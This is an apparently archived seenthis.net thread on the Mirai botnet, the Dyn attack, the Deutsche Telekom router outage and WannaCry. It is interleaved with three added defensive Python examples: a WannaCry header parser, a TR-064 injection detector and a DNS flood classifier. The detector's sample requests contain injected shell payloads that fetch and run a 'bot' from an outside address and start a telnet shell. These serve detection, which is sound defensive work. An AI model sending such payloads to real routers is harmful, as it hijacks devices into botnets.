#mirai

    Stéphane Bortzmeyer @stephane CC BY-SA 27/07/2020

    "5G: 6 arguments for a strategic moratorium"

    "Can we have a strategic debate on #5G, or must we make do with a priori positions for or against? Is the game already over, or can European states and their citizens recover their sovereignty in this matter? Six arguments should be debated separately and with equal importance: health, the environment, sovereignty, territories, social utility, security."

    ▻https://blogs.mediapart.fr/dominique-g-boullier/blog/160720/5g-6-arguments-pour-un-moratoire-strategique

      Stéphane Bortzmeyer @stephane CC BY-SA 27/07/2020

      Rather less nonsense than in many texts on the subject, especially compared with all the ravings one reads about 5G. It is well argued and I agree with him on the approach, but...

      [Already, the section on health... Why demand such precautions for 5G and not for every other innovation?]

      The troll against "porn, YouTube and Netflix" is really too easy. Besides the somewhat reactionary value judgement (TV is bad), it ignores the extreme variety of content on YouTube (from brilliant to appalling).

      The idea "Can't we at the same time have a discussion about which content should be favoured?" is very dangerous. It leads to violations of neutrality, and it opens an endless discussion about "is it better to broadcast football matches or philosophy lectures?".

      And the cybersecurity analysis is completely wrong. Flaws in websites that lead to personal-data leaks have nothing to do with the connection technology (5G or not).

      But above all, the call to strengthen security is ambiguous: it can just as well lead to demands for a "civilised" network (N. Sarkozy), tightly controlled. Sentences like "we must now take back complete control of the network and totally overhaul the ad hoc regulatory bodies of the Internet" are frightening.

      In passing, the analysis of the #Mirai attack against #Dyn ("the address provider for the whole North-East quarter of the United States", ha ha) is really slapdash and contains several serious errors (or exaggerated simplifications, to be kind). #DNS

      And I am criticising here because I don't see how to comment on an article on the Mediapart blogs.

      Vanderling @vanderling 27/07/2020

      The troll against "porn, YouTube and Netflix" is really too easy. Besides the somewhat reactionary value judgement (TV is bad), it ignores the extreme variety of content on YouTube (from brilliant to appalling).

      ▻https://medium.com/@louisther37/comment-contourner-le-blocage-des-sites-pornographiques-ffb236c980da

      https://miro.medium.com/max/700/1*qcG9sjla5X0m-9kCGyd3Bg.jpeg

      #jackie&michel

    schrödinger @erratic 13/05/2017

    Warning: for Windows systems: important spread of #WannaCry (#Wcry) ransomware

    ▻http://thehackernews.com/2017/05/wannacry-ransomware-unlock.html?m=1
    ▻https://arstechnica.com/security/2017/05/an-nsa-derived-ransomware-worm-is-shutting-down-computers-worldwide

    The malware/worm is causing disruptions at banks, hospitals, telecommunications services, train stations, and other mission-critical organisations in multiple countries, including the UK, Spain, Germany, and Turkey. Telefonica, FedEx, and the UK government’s National Health Service (NHS) have been hit. Operations were cancelled, x-rays, test results and patient records became unavailable and phones did not work.

    The ransomware completely encrypts all your files and renders them unusable. They ask you to pay some money to get the decryption key ($300 to $600 worth in bitcoins). Paying does not guarantee you will get a decryption key though.

    The malware spreads through social engineering e-mails.
    Be careful with any attachments you receive from unknown sources (and even known sources). Make sure the files are sent intentionally.
    Watch out for .pdf or .hta files, or links received via e-mail that point to .pdf or .hta files.

    More than 45.000 computers worldwide have already been infected, but there appears to be a kill switch, i.e. a way to stop its spreading.
    As one of the first operations, the malware tries to connect to the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. It doesn’t actually download anything there, just tries to connect. If the connection succeeds, the program terminates.

    This can be seen as a kind of kill switch provision, or perhaps it had some particular reason. Whichever it is, the domain has now been sinkholed and the host in question now resolves to an IP address that hosts a website. Therefore, nothing will happen on any new systems that run the malware. This will of course not help anyone already infected.

    Microsoft has released a patch to block the malware on Windows machines:

    MS17-010
    ▻https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

    It is important to apply the patch because other variants of the malware can exploit the same vulnerability and/or use a different domain name check.

    Nice technical analysis of the worm:

    ▻https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r

    And more technical info about the worm itself: (careful)

    ▻https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

    #include <stdint.h>

    #define WC_SIG_LEN    8    /* "WANACRY!" is 8 bytes */
    #define WC_ENCKEY_LEN 256  /* output size of the RSA-2048 wrapping of the AES key */

    typedef struct _wc_file_t {
        char     sig[WC_SIG_LEN];     // 64 bit signature WANACRY!
        uint32_t keylen;              // length of encrypted key
        uint8_t  key[WC_ENCKEY_LEN];  // AES key encrypted with RSA
        uint32_t unknown;             // usually 3 or 4, unknown
        uint64_t datalen;             // length of file before encryption, obtained from GetFileSizeEx
        uint8_t *data;                // ciphertext: encrypted data using AES-128 in CBC mode
    } wc_file_t;

    #malware #worm #ransomware #NSA #Shadow_Broker #EternalBlue

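A parser for the header that WannaCry writes in front of each encrypted file, following the wc_file_t layout quoted above. This is an added example, not code from the post or from the linked gist. It assumes that on disk the ciphertext immediately follows the header (the struct's `data` pointer), that the wrapped-key field is 256 bytes (RSA-2048 output), and the sample blob it parses is constructed, with no real key material in it.

```python
"""Parse the header WannaCry prepends to every encrypted file (wc_file_t).
Added example; assumptions: ciphertext follows the header directly, the
wrapped key field is 256 bytes, and the sample blob below is constructed."""
import struct
from dataclasses import dataclass

WC_SIG = b"WANACRY!"                      # the 64-bit signature
WC_ENCKEY_LEN = 256                       # AES key wrapped with the 2048-bit RSA key
HEADER_FMT = "<8sI256sIQ"                 # sig, keylen, key, unknown, datalen
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 8 + 4 + 256 + 4 + 8 = 280 bytes
AES_BLOCK = 16


@dataclass
class WcFile:
    keylen: int
    enc_key: bytes     # still wrapped; useless without the attacker's RSA private key
    unknown: int       # "usually 3 or 4" per the struct comment
    datalen: int       # original plaintext size recorded by the malware
    ciphertext: bytes  # AES-128-CBC output, whole blocks


def parse_wncry(blob: bytes) -> WcFile:
    """Split a .WNCRY blob into its fields; raise ValueError if it is not one."""
    if len(blob) < HEADER_LEN:
        raise ValueError("too short to hold a WANACRY! header")
    sig, keylen, key, unknown, datalen = struct.unpack_from(HEADER_FMT, blob)
    if sig != WC_SIG:
        raise ValueError("missing WANACRY! signature")
    if not 0 < keylen <= WC_ENCKEY_LEN:
        raise ValueError(f"implausible wrapped-key length {keylen}")
    ciphertext = blob[HEADER_LEN:]
    # CBC output is whole blocks and, with padding, at least datalen bytes long.
    if len(ciphertext) % AES_BLOCK or len(ciphertext) < datalen:
        raise ValueError("ciphertext length inconsistent with datalen")
    return WcFile(keylen, key[:keylen], unknown, datalen, ciphertext)


def make_sample(plaintext_len: int) -> bytes:
    """Constructed sample with the real layout but dummy contents: no real key,
    no real ciphertext, just the right sizes (PKCS#7-style padded length)."""
    padded_len = (plaintext_len // AES_BLOCK + 1) * AES_BLOCK
    header = struct.pack(HEADER_FMT, WC_SIG, WC_ENCKEY_LEN,
                         b"\x41" * WC_ENCKEY_LEN, 4, plaintext_len)
    return header + b"\x00" * padded_len


if __name__ == "__main__":
    f = parse_wncry(make_sample(1000))
    print(f.keylen, f.datalen, len(f.ciphertext))  # 256 1000 1008
```

The length checks are what make this useful in triage: a file carrying the `WANACRY!` magic but with a ciphertext that is not block-aligned or is shorter than `datalen` was not produced by the encryptor described here and should not be fed to a recovery tool.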
      schrödinger @erratic 13/05/2017

      here too: ►https://seenthis.net/messages/597948

      schrödinger @erratic 13/05/2017

      In French:

      ▻http://www.leparisien.fr/high-tech/douze-pays-victimes-d-une-cyberattaque-massive-des-hopitaux-britanniques-
      ▻http://www.lemonde.fr/international/article/2017/05/13/une-cyberattaque-massive-bloque-des-ordinateurs-dans-des-dizaines-de-pays_51
      ►http://www.lalibre.be/dernieres-depeches/afp/une-attaque-informatique-massive-frappe-a-travers-le-monde-5916cbd3cd7002254

      schrödinger @erratic 13/05/2017

      and for the less technical readers:

      ▻http://www.leparisien.fr/high-tech/cyberattaque-massive-quelle-attitude-adopter-face-a-un-rancongiciel-13-05

      "Rançongiciels" ("ransomware" in English) promise to release your data in exchange for a ransom payment. A few tips to guard against this type of attack, or to deal with it.

      schrödinger @erratic 13/05/2017

      https://pbs.twimg.com/media/Cud5h2BWcAAq_X7.jpg

      Sandburg @sandburg CC BY-SA 13/05/2017

      The Internet of Things and the problems that are not yet very visible:
      ▻https://seenthis.net/messages/598009

      @erratic do you have another link to this cartoon?
      (Test) this link looks static:

      http://www.geekculture.com/joyoftech/joyimages/2340.png

      fred1m @fredlm PUBLIC DOMAIN 15/05/2017

      #zero_day

      schrödinger @erratic 16/05/2017

      As expected, new variants have arrived which no longer have the "kill switch" bypass.

      The amount of infected machines has reached 200.000 now.

      ▻https://www.cnet.com/news/wannacry-ransomware-patched-updated-virus-kill-switch
      ▻https://heimdalsecurity.com/blog/security-alert-uiwix-ransomware

      #Uiwix

      schrödinger @erratic 16/05/2017

      A regularly updated page with lots of interesting info on the evolution of this WannaCry malware

      ▻https://www.wannacry.be

      schrödinger @erratic 20/05/2017

      Hackers are trying to reignite WannaCry with botnet attacks

      As WannaCry went to sleep by registering a certain domain and putting a live web server on that IP (kill switch), hackers now try to bring down that web server so that the WannaCry infected machines would wake up again

      ▻https://www.wired.com/2017/05/wannacry-ransomware-ddos-attack

      #Mirai

      schrödinger @erratic 20/05/2017

      Supposedly, it is possible to get decryption keys without paying the ransom - provided you didn’t reboot your windows machine.

      ▻http://www.ibtimes.co.uk/wannacry-how-decrypt-recover-your-data-infected-windows-systems-1622512

      IBTimes UK earlier reported how French cybersecurity researcher Adrien Guinet, from Quarkslab, released a decrypting tool that allowed only Windows XP users to recover their data. Guinet's work was advanced by internationally acclaimed ethical hacker Benjamin Delpy who exploited the shortcomings of WannaCry and used it to create a tool called WanaKiwi that produces a decryption key for Windows XP, 7, 2003, 2008 and possibly Vista.

      French ethical hacker and co-founder of CloudVolumes, Matt Suiche confirmed that WanaKiwi has been tested and shown to work on Windows 7 and older Windows versions like XP, 2003 and more. Europe also tweeted confirming they were able to use the tool for decryption.

      How it works
      While WannaKey extracted prime numbers that had not been erased from the system and were vital to the decryption key, it required a separate app to transform those bits into the secret key. WanaKiwi scours the memory of the infected systems, extracts the p and q variables the secret key was based on, and reassembles the finished key all by itself. The tool then uses the key to decrypt all files locked by the WannaCry ransomware.

      The WanaKiwi decryption tool:

      ▻https://github.com/gentilkiwi/wanakiwi/releases/tag/0.1

    e-traces @etraces ART LIBRE 12/05/2017

    A piece of malware targets 120,000 webcams and surveillance cameras
    ▻http://www.lefigaro.fr/secteur/high-tech/2017/05/12/32001-20170512ARTFIG00124-un-logiciel-malveillant-vise-120000-webcams-et-ca

    A new type of malware has been spotted on the Web. Inspired by Mirai, the new program infects connected objects and puts them under the control of hackers. Webcams are prime targets for hackers. The cybersecurity company Trend Micro has discovered a new type of malware on the Internet. In a report, it states that 120,000 webcams and surveillance cameras are vulnerable and can be enlisted into networks of zombie machines. Also called (...)

    #Mirai #spyware #webcam #hacking

      Vanderling @vanderling 12/05/2017

      Another sordid webcam story

      The ransom of shame: webcam blackmail is on the rise (a warning to fans of online sex...)
      A new scam is growing on the web: the
      #scam_sex. The principle? Pose as a young woman, flirt with an Internet user, push him to masturbate in front of his webcam... then threaten to release the video if he does not pay a ransom.

      ▻http://www.atlantico.fr/decryptage/rancon-honte-chantages-webcam-se-multiplient-avis-aux-amateurs-sexe-en-ligne-scam-sex-franck-decloquement-2865327.html/page/0/1
      ▻http://www.bbc.com/news/uk-38150313
      #sextorsion #racket #suicide #branlette_2.0 #misère_sexuelle

      schrödinger @erratic 13/05/2017

      #Persirai

    Stéphane Bortzmeyer @stephane CC BY-SA 18/01/2017

    We now know the name of the author of the #Mirai #malware. He was identified by his rather unusual combination of skills, which he had boasted about on a forum under a pseudonym and on LinkedIn under his real name...

    ▻https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author

    #botnet #cyberdélinquance #vantardise

    • #LinkedIn
      schrödinger @erratic 18/01/2017

      #DDoS

      schrödinger @erratic 22/01/2017

      ▻https://techcrunch.com/2017/01/18/mirai-botnet-creator-unmasked-as-ddos-protection-developer-tempted-by-th

      But for those of you who just want to skip to the end, here’s the executive summary. Anna-senpai appears to be one of perhaps a dozen aliases for one Paras Jha, founder of DDOS protection service ProTraf. ProTraf was in fierce competition over the lucrative Minecraft server market, and seems to have resorted to underhanded tactics in order to drive customers away from other hosts.

      Several ProTraf employees — perhaps all of them, in fact — seem in various online conversations indirectly attributable to them to threaten, create, and execute DDOS attacks on competitors and for hire — $100 in bitcoin for every five minutes of attack time.

      Jha looks to have been undone by the compulsive need of hackers operating in the shadows to claim credit for their work. Various personas linked to Jha and his colleagues take responsibility for numerous attacks, the creation of the Mirai code, and extorting service providers worldwide.

      Slips here and there (identical coding skills between two online identities, for instance, or an attack utilising data only certain people could know) allowed the dots to be connected by Krebs, who understandably took the September takedown of his own site as something of a personal affront.

      https://tctechcrunch2011.files.wordpress.com/2017/01/miraiconnections.png

    schrödinger @erratic 29/11/2016

    Failed #Mirai botnet attack causes internet outage for 900,000 Germans

    ▻http://www.dw.com/en/deutsche-telekom-hack-part-of-global-internet-attack/a-36574934

    German security experts have suggested internet outages that have hit hundreds of thousands of Deutsche Telekom customers in Germany were part of a worldwide attempt to hijack routing devices.

    “The BSI considers this outage to be part of a worldwide attack on selected remote management interfaces of DSL routers,” the government agency said on its website.

    Deutsche Telekom said the issues seemed to be connected to an attempt to make a number of customers’ routers part of the Mirai botnet.

    Deutsche Telekom information page:

    ▻https://www.telekom.com/en/media/media-information/archive/information-on-current-problems-444862

    Deutsche Telekom has developed a software update together with the router manufacturers which is offered for download here ▻https://www.telekom.de/stoerung

    #DDoS
    #botnet

    • #Deutsche Telekom
      schrödinger @erratic 8/12/2016

      What was behind this Mirai variant is the exploitation of a #TR-064 protocol vulnerability (CPE WAN Management Protocol, or #CWMP)

      ▻https://www.incapsula.com/blog/new-variant-mirai-embeds-talktalk-home-routers.html

      TR-069 is a widely used protocol many ISPs employ to remotely manage network routers. Its communication occurs on port 7547, to which remote commands are sent. One such command is Time/SetNTPServers, used to synchronize a router with an external time source.

      However, this same command can also be modified to let hackers remotely execute bash commands. Among other things, this enables them to:

      • Open port 80 for remote access.
      • Obtain Wi-Fi passwords.
      • Modify the iptables rules.
      • Inject malware into the device.

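A detector for the abuse the reply above describes: a SetNTPServers request on the port-7547 management interface whose NTP-server parameter carries shell syntax instead of a hostname. This is an added example, not code from the post or from the Incapsula article. The SOAP request shape, the sample requests and the rule that a legitimate NewNTPServer value is only ever a hostname or an IP literal are assumptions of the example.

```python
"""Flag shell-command injection in TR-064 SetNTPServers requests (TCP/7547).
Added example; the SOAP shape, sample traffic and hostname rule are assumed."""
from __future__ import annotations
import re
from typing import Iterable

NTP_VALUE_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")       # hostname or dotted quad only
NTP_ELEM_RE = re.compile(r"<(NewNTPServer\d)>(.*?)</\1>", re.DOTALL)
SETNTP_ACTION_RE = re.compile(r'SOAPAction:\s*"?[^"\r\n]*#SetNTPServers"?', re.I)


def suspicious_ntp_values(http_request: str) -> list[tuple[str, str]]:
    """(element, value) pairs of a SetNTPServers request whose value is not a
    plain hostname/IP: backticks, $(...), ';' or quotes mean the string is meant
    for the CPE's shell, not its NTP client."""
    if not SETNTP_ACTION_RE.search(http_request):
        return []
    return [(elem, val) for elem, val in NTP_ELEM_RE.findall(http_request)
            if not NTP_VALUE_RE.match(val.strip())]


def scan_requests(requests: Iterable[tuple[str, str]]) -> list[dict]:
    """requests: (source_ip, raw HTTP request to :7547). One alert per bad request."""
    return [{"src": src, "values": bad}
            for src, raw in requests if (bad := suspicious_ntp_values(raw))]


def _soap(action: str, body: str) -> str:
    """Build a constructed TR-064 request against the Time service (assumed shape)."""
    return ("POST /UD/act?1 HTTP/1.1\r\nHost: 192.0.2.1:7547\r\n"
            f'SOAPAction: "urn:dslforum-org:service:Time:1#{action}"\r\n\r\n'
            f"<s:Envelope><s:Body><u:{action}>{body}</u:{action}></s:Body></s:Envelope>")


SAMPLE_REQUESTS = [  # constructed traffic, not captures
    ("203.0.113.5", _soap("SetNTPServers", "<NewNTPServer1>0.pool.ntp.org</NewNTPServer1>")),
    ("203.0.113.6", _soap("GetInfo", "")),
    ("198.51.100.7", _soap("SetNTPServers",
        "<NewNTPServer1>`cd /tmp;wget 203.0.113.9/bot;sh bot`</NewNTPServer1>")),
    ("198.51.100.8", _soap("SetNTPServers",
        "<NewNTPServer1>$(busybox telnetd -p 2323)</NewNTPServer1>")),
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(alert["src"], alert["values"])
```

The allow-list approach (match what a valid value looks like) is deliberate: a deny-list of metacharacters misses encodings the CPE's own parser still accepts, whereas a hostname grammar rejects anything that is not a name. On a real deployment the same rule belongs on the ISP edge in front of port 7547, where the BSI statement above says the attack traffic arrived.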
    e-traces @etraces ART LIBRE 29/11/2016

    Germany accuses Russia of cyberattacks
    ▻http://www.lemonde.fr/europe/article/2016/11/29/l-allemagne-accuse-la-russie-de-cyberattaques_5040241_3214.html

    Berlin sees in the multiplication of recent hacks Moscow's intent to disrupt the political game less than a year before the German legislative elections. Less than a year before the legislative elections, Germany fears a multiplication of hacks, notably from Russia, aimed at disrupting the political game. "Europe is at the centre of these destabilisation attempts, and Germany in particular," said the head of intelligence on Tuesday 29 November (...)

    #Mirai #hacking #Deutsche_Telekom

    • #Allemagne
    schrödinger @erratic 9/11/2016

    Researcher develops worm to fight Mirai botnet

    Researcher Scott Tenaglia found a stack buffer overflow vulnerability in the Mirai code which could be used to crash bots and shut down Mirai attacks.

    ▻http://www.theregister.co.uk/2016/10/28/mirai_botnet_hack_back

    Now, a GitHub user going by Leo Linsky has forked a repo created by researcher Jerry Gamblin to create an anti-worm “nematode” that could help to patch vulnerable devices used in the Mirai DDoS attacks. (the code is unfortunately no longer available)

    ▻http://www.theregister.co.uk/2016/10/31/this_antiworm_patch_bot_could_silence_epic_mirai_ddos_attack_army

    A Nematode is a controlled worm that can be used for beneficial purposes, such as self-healing networks.

    The worm goes further and can be used to break into woefully insecure internet-of-things devices and change the default Telnet credentials within.

    Doing so would lock Mirai and other malware users out of the devices, along with legitimate administrators.

    “This is a purely academic research project intended to show a proof of concept anti-worm worm, or nematode, for the types of vulnerabilities exploited by Mirai,” Linsky says.

    "The idea is to show that devices can be patched by a worm that deletes itself after changing the password to something device- specific or random.

    Unleashing the nematode would breach computer crime laws in the US, UK, and Australia, and likely in many other countries where unauthorised use and modification of computer equipment is an offense.

    More on Mirai

    ►https://seenthis.net/messages/531503

    #Mirai #DDoS #malware

    schrödinger @erratic 6/11/2016

    A Mirai botnet perturbed Liberia's internet connectivity

    Liberia is connected to internet via only one undersea cable (part of ACE - African Coast to Europe) of 5.12 Tbps, shared between all 23 countries connected via ACE.

    Mirai has been targeting IP addresses of Lonestarcell MTN, one of the telecom operators managing the Liberian ACE leg, flooding the pipe with 500 Gbps and thereby impacting Liberia's internet several times (well, the 6% of the country that actually has internet access).
    Lonestarcell MTN is one of the 4 telecom operators

    ▻http://thehackernews.com/2016/11/ddos-attack-mirai-liberia.html

    Many media, including BBC, PC World, The Guardian, Forbes, IBtimes, Quartz, Mashable, The Register, inaccurately reported that Liberia was totally cut off.

    https://upload.wikimedia.org/wikipedia/commons/d/d4/Cable_map18.svg

    ▻https://krebsonsecurity.com/2016/11/did-the-mirai-botnet-really-take-liberia-offline

    "Both our ACE submarine cable monitoring systems and servers hosted (locally) in LIXP (Liberia Internet Exchange Point) show no downtime in the last 3 weeks," [the general manager of Cable Consortium of Liberia] said. "While it is likely that a local operator might have experienced a brief outage, we have no knowledge of a national Internet outage and there are no data to substantiate that."

    Mirai announces its attacks here:

    ▻https://twitter.com/MiraiAttacks

    #Mirai #DDoS #botnet
    #undersea_cable #câble_sous-marin

    • #Liberia
      CDB_77 @cdb_77 7/11/2016

      #Afrique #câbles_sous-marins #Internet

      schrödinger @erratic 8/11/2016

      Liberian Observer:

      Lonestar Cell MTN has contracted Arbor’s DDoS mitigation service.

      ▻http://www.liberianobserver.com/news/hackers-attack-lonestar-mtn-network

      Lonestar Cell MTN is pleading to the Liberian authorities to take this issue seriously, because this threat could affect other financial institutions.

      The cellular network provider is calling on the government through its security apparatus to institute immediate investigation into the matter as these DDOS attacks amount to economic sabotage and calls on the LTA to ensure that Liberia urgently joins Africa CERT, an organization setup to protect countries around Africa against cyber threats.

      #Arbor

    Mediapart @mediapart 27/10/2016

    Connected objects attack the Internet
    ▻https://www.mediapart.fr/journal/international/271016/les-objets-connectes-s-attaquent-internet

    For several weeks, researchers have been warning about the spread of a #Malware, a computer program installed in connected objects (surveillance cameras, video recorders) in order to take control of them. Last weekend, a network of infected machines launched a large-scale attack that took many sites such as Twitter or Spotify offline.

    #International #attaque_DDoS #Mirai #Numérique #sécurité_informatique

    e-traces @etraces ART LIBRE 26/10/2016

    The security of connected objects called into question after a violent cyberattack
    ▻http://www.lemonde.fr/pixels/article/2016/10/25/la-securite-des-objets-connectes-en-question-apres-une-violente-attaque-info

    Hundreds of thousands of objects are currently connected and can be used to launch attacks. We still do not know who carried out and ordered the powerful cyberattack that paralysed part of the Web, mainly in the United States, on Friday 21 October. Details have however emerged about the modus operandi: part of the flood of connections that brought some of the world's biggest sites to their knees came from a network of connected objects (...)

    #malware #Mirai #hacking

    e-traces @etraces ART LIBRE 24/10/2016

    How surveillance cameras made part of the web inaccessible
    ▻http://www.numerama.com/tech/203367-comment-des-cameras-de-surveillance-ont-rendu-inaccessible-une-part

    PSN, Twitter, Netflix, PayPal and eBay were inaccessible from Friday evening until Saturday night. The attack against Dyn was orchestrated from poorly secured connected objects infected by the Mirai malware. Terminator tells us the story of an uprising of machines which, with plenty of artificial intelligence, robots and guns, comes to ravage Humanity. It makes a good action film that stays far from our daily lives. In 2016, the attack by connected objects against (...)

    #algorithme #CCTV #malware #hacking #Mirai

    • #eBay
    • #Twitter
    schrödinger @erratic 24/10/2016

    NewWorldHackers & Anonymous are behind the massive DDoS attack against Dyn DNS service, using the Mirai botnet and other booters

    ▻http://securityaffairs.co/wordpress/52583/hacking/dyn-dns-service-ddos-3.html

    When I asked which Anon groups were involved, they replied to me that many crews targeted the Dyn DNS service.
    "Anonymous, pretty much all of Anonymous," said NewWorldHackers.
    They confirmed to me that they are testing the capability of their botnet, highlighting that the DDoS attack against the Dyn DNS service was carried out with the Mirai botnet alongside other booters.

    #DDoS #botnet #Mirai
    #NewWorldHackers #Anonymous
    #Dyn #DNS
    #IoT

    • #Akamai
    • #DNS
      schrödinger @erratic 24/10/2016

      Statement by Dyn

      ▻http://hub.dyn.com/static/hub.dyn.com/dyn-blog/dyn-statement-on-10-21-2016-ddos-attack.html

      We can confirm, with the help of analysis from Flashpoint and Akamai, that one source of the traffic for the attacks were devices infected by the Mirai botnet. We observed 10s of millions of discrete IP addresses associated with the Mirai botnet that were part of the attack.

      #Flashpoint #Akamai

      schrödinger @erratic 24/10/2016

      Krebs’s view on this

      ▻https://krebsonsecurity.com/2016/10/hacked-cameras-dvrs-powered-todays-massive-internet-outage

      "The issue with these particular devices is that a user cannot feasibly change this password," Flashpoint's Zach Wikholm told KrebsOnSecurity. "The password is hardcoded into the firmware, and the tools necessary to disable it are not present."

      #XiongMai

      schrödinger @erratic 24/10/2016

      Rumours about extortion

      ▻http://www.networkworld.com/article/3133751/security/extensive-ddos-attack-against-dyn-restarts-could-indicate-a-new-use-of

      Cunningham [director of cyber operations for A10 Networks] says he’s seen chatter on underground forums indicating that the attackers tried to extort Bitcoin from Dyn by threatening the attacks, and when the provider didn’t pay up, launched them. He says Dyn seems to be doing a pretty good job of mitigating the effects relatively quickly.

      schrödinger @erratic 24/10/2016

      Lengthy and interesting article by #Level3 on Mirai, containing information on the C2s (command & control servers) and the structure of the botnet

      ▻http://blog.level3.com/security/grinch-stole-iot

      By analyzing the communication patterns of the Mirai C2 IP addresses, we were able to identify and enumerate Mirai’s infrastructure. This analysis was later confirmed accurate when the Mirai source code was released.

      http://blog.level3.com/wp-content/uploads/2016/10/Figure-3-Mirai.jpg

      #gafgyt

      schrödinger @erratic 24/10/2016

      The Mirai source code

      ▻https://github.com/jgamblin/Mirai-Source-Code

      schrödinger @erratic 24/10/2016

      Chinese firm admits its hacked DVRs, cameras were behind [Dyn DNS] massive DDOS attack

      ▻http://www.pcworld.com/article/3134039/hacking/chinese-firm-admits-its-hacked-products-were-behind-fridays-massive-ddos-at

      Hangzhou Xiongmai Technology, a vendor behind DVRs and internet-connected cameras, said on Sunday that security vulnerabilities involving weak default passwords in its products were partly to blame.

      schrödinger @erratic 9/11/2016

      DDoS on Dyn used malicious TCP, UDP traffic

      ▻http://www.darkreading.com/attacks-breaches/ddos-on-dyn-used-malicious-tcp-udp-traffic-/d/d-id/1327309

      Scott Hilton, executive vice president of product for Dyn, in a blog post said the attackers employed masked TCP and UDP traffic via Port 53 in the attack as well as recursive DNS retry traffic, “further exacerbating its impact,” he said.

      [...]

      He noted that the DNS traffic sent in the DDoS attacks also generated legitimate DDoS retry traffic, making the attack more complicated to parse, and the attack generated ten- to 20 times the normal DNS traffic levels thanks to malicious and legit retries.

      “During a DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic,” he said in the post. “When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume. We saw both attack and legitimate traffic coming from millions of IPs across all geographies.”

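The Dyn statement above describes two kinds of load arriving together: legitimate resolvers retrying the same names under congestion, and attack queries for names that never repeat (the random-subdomain "water torture" pattern tagged further down this thread). The following is an added example, not code from the post or from Dyn, of how a query log can tell the two apart. The `src qname` line format, the thresholds and the sample log are constructed for the example.

```python
"""Separate retrying clients from random-subdomain flooders in a DNS query log.
Added example; log format, thresholds and sample lines are constructed."""
import math
import random
import string
from collections import defaultdict


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in
                (label.count(ch) for ch in set(label)))


def apex(qname: str) -> str:
    """Crude registrable-domain guess: the last two labels (enough for the sample)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def classify_sources(lines, min_queries=20, entropy_bits=2.5,
                     unique_ratio=0.9, random_share=0.8):
    """lines: 'src qname ...' strings. Returns {src: 'water-torture'|'retry'|'normal'}."""
    seen = defaultdict(list)
    for line in lines:
        src, qname = line.split()[:2]
        seen[src].append(qname.lower())
    verdict = {}
    for src, names in seen.items():
        if len(names) < min_queries:
            verdict[src] = "normal"
            continue
        distinct = set(names)
        random_labels = sum(1 for q in distinct
                            if label_entropy(q.split(".")[0]) >= entropy_bits)
        single_zone = len({apex(q) for q in distinct}) == 1
        if (single_zone and len(distinct) / len(names) >= unique_ratio
                and random_labels / len(distinct) >= random_share):
            verdict[src] = "water-torture"   # many unique junk names, one victim zone
        elif len(distinct) <= 3:
            verdict[src] = "retry"           # the same few names over and over
        else:
            verdict[src] = "normal"
    return verdict


def build_sample_log():
    """Constructed log: one water-torture bot, one retrying resolver, one normal client."""
    rng = random.Random(7)
    alphabet = string.ascii_lowercase + string.digits
    lines = []
    for _ in range(30):
        junk = "".join(rng.choice(alphabet) for _ in range(16))
        lines.append(f"198.51.100.7 {junk}.victim.example")
    lines += ["203.0.113.5 www.victim.example"] * 30
    zones = ["www.example.com", "mail.example.org", "cdn.example.net", "api.example.edu"]
    lines += [f"192.0.2.44 {zones[i % 4]}" for i in range(25)]
    return lines


if __name__ == "__main__":
    for src, verdict in classify_sources(build_sample_log()).items():
        print(src, verdict)
```

The point of the split is operational: sources classed as `retry` are the collateral Dyn mentions and must not be rate-limited into failure, while `water-torture` sources can be dropped per-source or answered from a synthetic NXDOMAIN path without touching the legitimate retries.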
    schrödinger @erratic 8/10/2016

    More on Mirai, and more than Mirai

    ▻http://www.securityweek.com/mirai-iot-botnet-not-only-contributor-massive-ddos-attack-akamai

    Akamai says Mirai was not alone:

    While Akamai confirmed that the Mirai botnet was part of the attack, the company also said that Mirai was only "a major participant in the attack" and that at least one other botnet might have been involved, though they couldn't confirm that the attacks were coordinated.

    Akamai refers to Mirai as Kaiten and has it documented here:
    ▻https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf

    More on the released source code of Mirai which confirms the use of GRE flooding, one of the techniques used on top of DNS Water Torture:

    ▻http://www.securityweek.com/hacker-releases-source-code-iot-malware-mirai

    A copy of the source code files provided to SecurityWeek includes a “read” where the author of Mirai explains his reasons for leaking the code and provides detailed instructions on how to set up a botnet.

    [...]

    Mirai, believed to have made rounds since May 2016, infects IoT devices protected by weak or default credentials. Once it hijacks a device, the threat abuses it to launch various types of DDoS attacks, including less common UDP floods via Generic Routing Encapsulation (GRE) traffic.

    This was proven through reverse-engineering by
    ▻http://cyberx-labs.com/en/blog/cyberx-reveals-gre-evidence-krebs-iot-based-attack-largest-ddos-interne

    GRE is still an uncommon attack vector, but it was already used during the 2016 Rio games
    ▻http://www.tripwire.com/state-of-security/security-data-protection/cyber-security/how-a-massive-540-gbsec-ddos-attack-failed-to-spoil-the-rio-olympics

    For some French, see also here:
    ▻https://seenthis.net/messages/530903

    #Mirai #Kaiten
    #Akamai
    #DDoS
    #Brian_Krebs
    #OVH
    #GRE
    #DNS_Water_Torture

    • #Akamai
      schrödinger @erratic 8/10/2016

      What cameras, IoT and DVR devices are taking part in Mirai?

      https://krebsonsecurity.com/wp-content/uploads/2016/10/iotbadpass-pdf.png

      from Krebs:

      ▻https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack

      schrödinger @erratic 8/10/2016

      ▻http://www.forbes.com/sites/thomasbrewster/2016/10/07/chinese-firm-xm-blamed-for-epic-ddos-attacks/#5b59fcd33bf5

      But one researcher, Flashpoint’s Zachary Wikholm, today claimed to have found a single Chinese firm, Hangzhou XiongMai Technologies (XM), that shipped flawed code allowing the perpetrators to potentially amass nearly half a million bots for their malicious network.

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 8/10/2016

